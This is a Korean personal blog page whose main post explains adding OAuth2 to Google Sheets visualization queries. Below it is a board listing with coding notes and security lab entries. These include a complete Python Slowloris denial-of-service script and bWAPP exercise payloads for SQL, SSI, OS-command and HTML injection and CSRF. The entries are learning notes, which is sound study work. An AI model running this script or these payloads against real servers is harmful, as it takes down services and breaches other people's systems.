[oAuth2] 구글 스프레드시트 접근

lispro062016.11.18 22:39조회 수 1658댓글 0

기존 data query 로 visualization 을 사용하던 코드에서

Error in query: ACCESS_DENIED. This spreadsheet is not publicly viewable and requires an OAuth credential.

상기와 같은 에러가 발생한다면, 아래를 통해 authorization 관련 내용을 추가해야 한다.

https://developers.google.com/chart/interactive/docs/spreadsheets

demo.html, demo.js 로 적용 가능하며, 개발자 콘솔에서 client id를 생성하여 해당 문서들에 적용해야 한다.

1) 프로젝트가 없다면 생성

2) 사용자 인증정보 선택

3) 사용자 인증정보 만들기 - OAuth 2.0 클라이언트 ID

도메인 입력(최상단 도메인으로 하면 된다.)

demo.js 의 makeApiCall() 함수에서 oauth2 라는 전역 변수에 추가 파라미터를 입력하고

function makeApiCall() {

// Note: The below spreadsheet is "Public on the web" and will work

// with or without an OAuth token. For a better test, replace this

// URL with a private spreadsheet.

var tqUrl = 'https://docs.google.com/spreadsheets' +

'/d/[SS경로]/gviz/tq' +

'?tqx=responseHandler:handleTqResponse' +

'&access_token=' + encodeURIComponent(gapi.auth.getToken().access_token);

oauth2 = '&tqx=responseHandler:handleTqResponse' + '&access_token=' + encodeURIComponent(gapi.auth.getToken().access_token);

$(window.document.body).append('<script src="' + tqUrl +'" type="text/javascript"></script>');

}

기존 visualization data query 호출 경로에 access_token 파라미터가 추가되도록 했다.

var srUrl = "https://docs.google.com/spreadsheets/d/[SS경로]/gviz/tq?gid=0"+oauth2;

오랜만에 다시하려니, 설명이 부족해 조금 더 추가함

문서에 들어갈 소스

<button id="authorize-button" style="visibility: hidden">Authorize</button>

[demo.js]

// NOTE: You must replace the client id on the following line.

var clientId = '발급받은ID';

var scopes = 'https://spreadsheets.google.com/feeds';

function init() {

gapi.auth.authorize(

{client_id: clientId, scope: scopes, immediate: true},

handleAuthResult);

}

function handleAuthResult(authResult) {

var authorizeButton = document.getElementById('authorize-button');

if (authResult && !authResult.error) {

authorizeButton.style.visibility = 'hidden';

makeApiCall();

} else {

authorizeButton.style.visibility = '';

authorizeButton.onclick = handleAuthClick;

}

function handleAuthClick(event) {

gapi.auth.authorize(

{client_id: clientId, scope: scopes, immediate: false},

handleAuthResult);

return false;

}

function makeApiCall() {

// Note: The below spreadsheet is "Public on the web" and will work

// with or without an OAuth token. For a better test, replace this

// URL with a private spreadsheet.

var tqUrl = 'https://docs.google.com/spreadsheets' +

'/d/[SS경로]/gviz/tq' +

'?tqx=responseHandler:handleTqResponse' +

'&access_token=' + encodeURIComponent(gapi.auth.getToken().access_token);

oauth2 = '&tqx=responseHandler:handleTqResponse' + '&access_token=' + encodeURIComponent(gapi.auth.getToken().access_token);

$(window.document.body).append('<script src="' + tqUrl +'" type="text/javascript"></script>');

}

function handleTqResponse(resp) {

데이터쿼리함수();

}

lispro06 (비회원)

수정 삭제

댓글 달기

검색 정렬

[C] epochtime double 형, sprintf

[원문보기]

char tseed[100];

CString csID;

time_t timer;

struct tm y2k;

double seconds;

y2k.tm_hour = 0; y2k.tm_min = 0; y2k.tm_sec = 0;

y2k.tm_year = 70; y2k.tm_mon = 1; y2k.tm_mday = 1;

time(&timer); /* get current time; same as: timer = time(NULL) */

seconds = difftime(timer,mktime(&y2k));

sprintf( tseed, "%s%.f", csID, seconds );

csID라는 CString 형과 epoch time(unixtime)을 tseed라는 char형에 넣으려고 1970년 1월 1일 기준을 difftime으로 구해 넣었다.

time(&timer)로 나오는 값은 long형인데, 활용이 잘 되지 않아, 이렇게 되었다.

비효율적이지만, 어쩔 수 없다.

[C#] 파일명 바꾸는 프로그램

[원문보기]

경로명을 참조하여 파일명을 바꾸는 프로그램이다.

private static string Rename(string filePath, string oldFile, string newFile)

{

newFile = filePath + "\" + newFile;

System.IO.File.Move(oldFile, newFile);

return "";

}

rename 함수는 인터넷에서 참조했고, 디렉터리를 리커시브하게 탐색하는 코드는 msdn에서 봤다.

c:에서 확장자를 지정하거나 파일명을 지정해 하위 폴더의 파일명을 바꾼다. 같은 레벨의 파일은 바뀌지 않는다.

한번 바뀐 파일은 no file 이란 출력을 하도록 개선했다.

[Perl] RUDY, Slowloris 공격

[원문보기]

http://advent.perl.kr/2012/2012-12-17.html

DoS 공격 중 탐지하기 어려워 방어가 용이하지 않은 slowloris 공격이 있다.

해당 공격 패킷을 Perl 로 작성한 예가 있는데, 직접 테스트 해 보았다.

$ sudo cpan IO::Socket::INET IO::Socket::SSL Devel::Trace::More

참조 경로에는 상기 명령어로 관련 라이브러리를 설치한다.

cpan 이나 필요한 것들이 있으면 더 설치한다.(OS 상황마다 다를 것이다.)

# ./app.pl -dns [타겟ip] -num [세션수] -timeout [유휴시간]

을 입력하면 문자열로 로고 비슷한 글자들이 출력되며 패킷 관련 내용이 출력된다.

와이어 샤크로 캡처해 보면, 새로운 세션들로(포트 번호가 증가하며) 접속 패킷이 전송된다.

웹서버에서도 netstat 로 여러 포트들이 연결되어 있는 것의 확인이 가능하다.

실제 공격은 불법이므로, 가상머신에서 테스트 해 보았다.

서버에서 허용된 세션 수를 초과하면 더 이상 접속되지 않는 것을 확인하였다.

[python]

import socket, random, time, sys

headers = [

"User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",

"Accept-language: en-US,en"

]

sockets = []

def setupSocket(ip):

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sock.settimeout(4)

sock.connect((ip, 80))

sock.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 1337)).encode("utf-8"))

for header in headers:

sock.send("{}\r\n".format(header).encode("utf-8"))

return sock

if __name__ == "__main__":

if len(sys.argv) != 2:

print("Use it like this: python {} example.com".format(sys.argv[0]))

sys.exit()

ip = sys.argv[1]

count = 200

print("Starting DoS attack on {}. Connecting to {} sockets.".format(ip, count))

for _ in range(count):

try:

print("Socket {}".format(_))

sock = setupSocket(ip)

except socket.error:

break

sockets.append(sock)

while True:

print("Connected to {} sockets. Sending headers...".format(len(sockets)))

for sock in list(sockets):

try:

sock.send("X-a: {}\r\n".format(random.randint(1, 4600)).encode("utf-8"))

except socket.error:

sockets.remove(sock)

for _ in range(count - len(sockets)):

print("Re-opening closed sockets...")

try:

sock = setupSocket(ip)

if sock:

sockets.append(sock)

except socket.error:

break

time.sleep(15)

[DROWN] Decrypting RSA with Obsolete and Weakened eNcryption

[원문보기]

DROWN 취약점이란 “Decrypting RSA with Obsolete and Weakened eNcryption: 취약한 구식 암호화법을 통한 RSA 복호화”에서 따온 이름으로, SSLv2취약점을 악용한 교차 프로토콜 공격입니다.

http://blog.alyac.co.kr/554

POODLE 과 RC4 관련 취약점 들을 제거하더라도 Openssl 관련 취약점이 계속 나오고 있다.

Heartbleed 는 시작이었다.

apache2 현재 Apache/2.2.22 (Ubuntu) OpenSSL 1.0.1 14 Mar 2012 에서 아래 옵션을 사용해 봤으나 TLSv1.1 이 잘 못 되었다는데, 해결은 추후에 해야겠다.

SSLProtocol -all +TLSv1.1 +TLSv1.2

SSLCipherSuite HIGH:!aNULL:!MD5:!SSLv2:!SSLv3:!TLSv1

RC4는

SSLProtocol all -SSLv2 -SSLv3

SSLHonorCipherOrder on

SSLCipherSuite "EECDH+ECDSA+AESGCM EECDH+aRSA+AESGCM EECDH+ECDSA+SHA384 EECDH+ECDSA+SHA256 EECDH+aRSA+SHA384 EECDH+aRSA+SHA256 EECDH+aRSA EECDH EDH+aRSA !aNULL !eNULL !LOW !3DES !MD5 !EXP !PSK !SRP !DSS"

위와 같이 하면 된 듯 하다.

보안서버가 아래와 같이 무료로 사용할 수 있지만, 설정에 따라 취약할 수 있으니, 이 점에 주의해야 한다.

무료 점검 해주는 사이트들이 많아 좋기는 한데, 설정을 강화해야 하는 번거로움이 있다.

	COMODO	Lets encrypt	Start SSL
금액	도메인 당 5만원 내외	무료	무료
사용기간	2년/1년	3개월(90일)	1년(365일)
의존성		openssl, git, python, gcc, etc…..(자동설치)
발급기관	verisign, comodo, …..	Mozilla, …….. sponsored by Google, Facebook, CISCO….	StartCom
지원서버	Apache, nginx, IIS, …..	Apache, nginx, iis(unstable), ?	Apache, IIS, …..
멀티도메인	별도 지원	일반적으로 어려움	유료 지원

[bWAPP] iFrame injection

[원문보기]

A1 - Injection

iFrame injection

iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250

ParamUrl 에 경로에 존재하는 파일을 넣으면 내용 확인 및 다운로드가 가능하다.

다운로드되는 파일은 portal.zip 이고, 나머지 php 파일 등은 렌더링되어 나오므로 파일 다운로드로 보기는 어렵다.

portal.bak, bugs,txt, 666 은 텍스트 형식이므로 내용 확인이 가능하다.

이를 소개한 동영상에서는 width, height를 바꾸거나 외부 경로 입력을 테스트 했다.

[bWAPP] HTML Injection - Reflected (GET/POST)

[원문보기]

A1 - Injection

HTML Injection - Reflected (GET/POST)

id, pw 필드에 스크립트 코드를 넣으면 레벨 0에서 간단히 테스트할 수 있는데, 요즘 브라우저에서는 교차스크립트 방지 필터가 동작하여 결과 확인이 어렵다.

보안설정을 아래와 같이 바꾸면 가능하다.

XSS 가 아니고, HTML이라, HTML 태그를 넣어 테스트 해보는 내용이다.

[bWAPP] HTML Injection - Reflected (URL)

[원문보기]

A1 - Injection

HTML Injection - Reflected (URL)

현재 url을 표시해주는 간단한 서버사이드 스크립트이다.

~.php?a={스크립트구문}

을 넣어주면 실행 가능하다.

html 인젝션은 주소창 뒤에 ? 을 넣고 태그를 넣으면 된다.

?<h1>test</h1>

[notion] 데이터베이스(페이지) 삭제(아카이빙)

[원문보기]

데이터베이스의 행(row)을 삭제하는 것을 찾아보면 archived 필드를 true로 변경하는 코드가 나온다.
클라우드플레어 노드 js로 계속 실패하여 포스트맨으로 테스해보고 문제 없는 코드임을 알았다.
content-type은 application/json으로 하고 method는 PATCH를 사용한다.
 
abc라는 변수는 데이터베이스의 pages id 에 해당한다.
이전 글의 데이터베이스 목록 출력시 나오는 id값을 사용하면 된다.
 
정상동작하면 메일로 API에 의해 수정되었다는 내용을 받을 수 있다.
archived 필드와 trashed 필드가 모두 true로 응답되면 정상 동작으로 확인할 수 있고, 재 요청시 에러가 발생한다.
"archived": false 를 보내서 복원할 수 있다.
 
async function handleRequest2(abc) {
const url2 = "https://api.notion.com/v1/pages/"+abc;
const body1 = {
"archived": true
}
const init = {
method: 'PATCH',
body: JSON.stringify(body1),
headers: {
'content-type': 'application/json;charset=UTF-8',
'Notion-Version': '2022-06-28',
'Authorization': 'Bearer secret_{}',
},
};
const response = await fetch(url2, init);
const results = await gatherResponse(response);
console.log(results);
let jsons = JSON.parse(results);
let res = jsons.archived;
if(res){
res="성공";
}
return new Response(res, init);
}

[bAWPP] HTML Injection - Stored (Blog)

[원문보기]

A1 - Injection

HTML Injection - Stored (Blog)

XSS 저장 방식이다.

게시판에 테스트 하듯이 스크립트 구문을 바로 입력하면 된다.

html 인젝션은 <h1>bee</h1><h2>bug</h2> 를 넣으면 된다.

[bWAPP] LDAP Injection (Search)

[원문보기]

A1 - Injection

LDAP Injection (Search)

search 구문에 * 을 넣으면 모든 사용자 검색이 가능하므로 해당 문자열을 사용하지 못하도록 한다.

로그인 우회는 확인 중이다.

[bWAPP] OS Command Injection [blind]

[원문보기]

A1 - Injection

OS Command Injection

동영상에서는 ; 등으로 테스트 하는데, windows 서버라 | (pipe, vertical var)로 하면 된다.

blind 의 경우,

명령어 >> 1.txt

로 파일을 만들어 해당 파일을 접근할 수 있다.

ren 이나, copy 명령어를 사용해 파일을 바꾸거나 txt 확장자로 교체해 소스 확인도 가능할 듯 하다.

del은 쓰지 말자.

[bWAPP] PHP Code Injection

[원문보기]

A1 - Injection

PHP Code Injection

해당 소스는 eval 로 되어 있다.

php 함수를 모두 사용 가능하다.

[bWAPP] Server-Side Includes (SSI) Injection

[원문보기]

A1 - Injection

Server-Side Includes (SSI) Injection

LoadModule 을 지원하는 환경에서 가능하다

입력 필드에  를 넣었을 때, 아래와 같이 나오면 LoadModule이 지원 안되는 것이다.

실행 자체가 안 되니 의미가 없다.

<p>Hello 11<!--#echo Var="DOCUMENT_ROOT" --> 11,</p><p>Your IP address is:</p><h1><!--#echo var="REMOTE_ADDR" --></h1>

http://lispro06.woweb.net/infra/51326 참고

* 그동안 cgi 로 혼동했다. T.T;;

[bWAPP] SQL Injection (GET[POST]/Select)

[원문보기]

A1 - Injection

SQL Injection (GET/Select)

movie=0+union select schema(),version(),user(),database(),SESSION_USER(),schema(),1--+-&action=go

~~GET[POST]/SEARCH 는 ' 로 되어 single quote 를 쓸 수가 없다. 동영상에는 그대로 되는데, 환경 탓 인가...~~

우분투에서는 되는군.

[이클립스] tomcat 404, spring, web API

[원문보기]

스프링 기반으로 개발하여, 디스패처 서블릿을 WEBXML 에 MVC 방식으로 매핑하여 개발하였을 때, 많은 복잡성이 발생한다.

톰캣의 배포된 실행 패키지를 정상 종료 시키지 않고 삭제하면, LOCK 이 걸려 재 컴파일해서 RUN 하더라도 쉽게 원하는 패키지가 실행되지 않는다.

그 때는 아예, 톰캣 서버를 완전히 지우고, 새로 서버를 만들어 실행한다.

[bWAPP] XSS - Reflected (User-Agent)

[원문보기]

A3 - Cross Site Scripting

XSS - Reflected (User-Agent)

header 값 중 user-agent에 스크립트를 삽입하여 전송하는 예제이다.

[bWAPP] Session Mgmt. - Administrative Portals

[원문보기]

A2 - Broken Auth. & Session Mgmt.

Session Mgmt. - Administrative Portals

admin 파라미터에 1을 넣으면 성공 메시지가 나온다.

[bWAPP] Insecure DOR (Order Tickets)

[원문보기]

A4 - Insecure Direct Object References

Insecure DOR (Order Tickets)

hidden 필드의 15eur을 변조하여 시도한다.

medium level에서는 post 파라미터에 ticket_price를 추가한다.

[bWAPP] Insecure DOR (Change Secret/Reset Secret)

[원문보기]

A4 - Insecure Direct Object References

Insecure DOR (Change Secret)

POST 파라미터로 전송되는 login 값을 수정한다.

XML 에 포함된 login 값을 수정한다.

[bWAPP] CSRF (Change Password)

[원문보기]

A8 - Cross Site Request Forgery

CSRF (Change Password)

패스워드 변경 경로를 삽입하여 타 계정으로 로그인한 사용자의 비밀번호를 변경한다.

이체 경로를 삽입하여 상대방 계좌의 금액을 차감 한다.

검색 정렬

이전 1 2 3 4 5 6 7 8 9 다음

APLOS BOARD 2 FREE LICENSE
DESIGN BY MACARON

검색

첨부 (2)

A8CSRF-PSWD.PNG
178.7KB / Download 31

A8CSRF-AMT.PNG
144.9KB / Download 24

imp

[oAuth2] 구글 스프레드시트 접근

댓글 달기

댓글 달기 닫기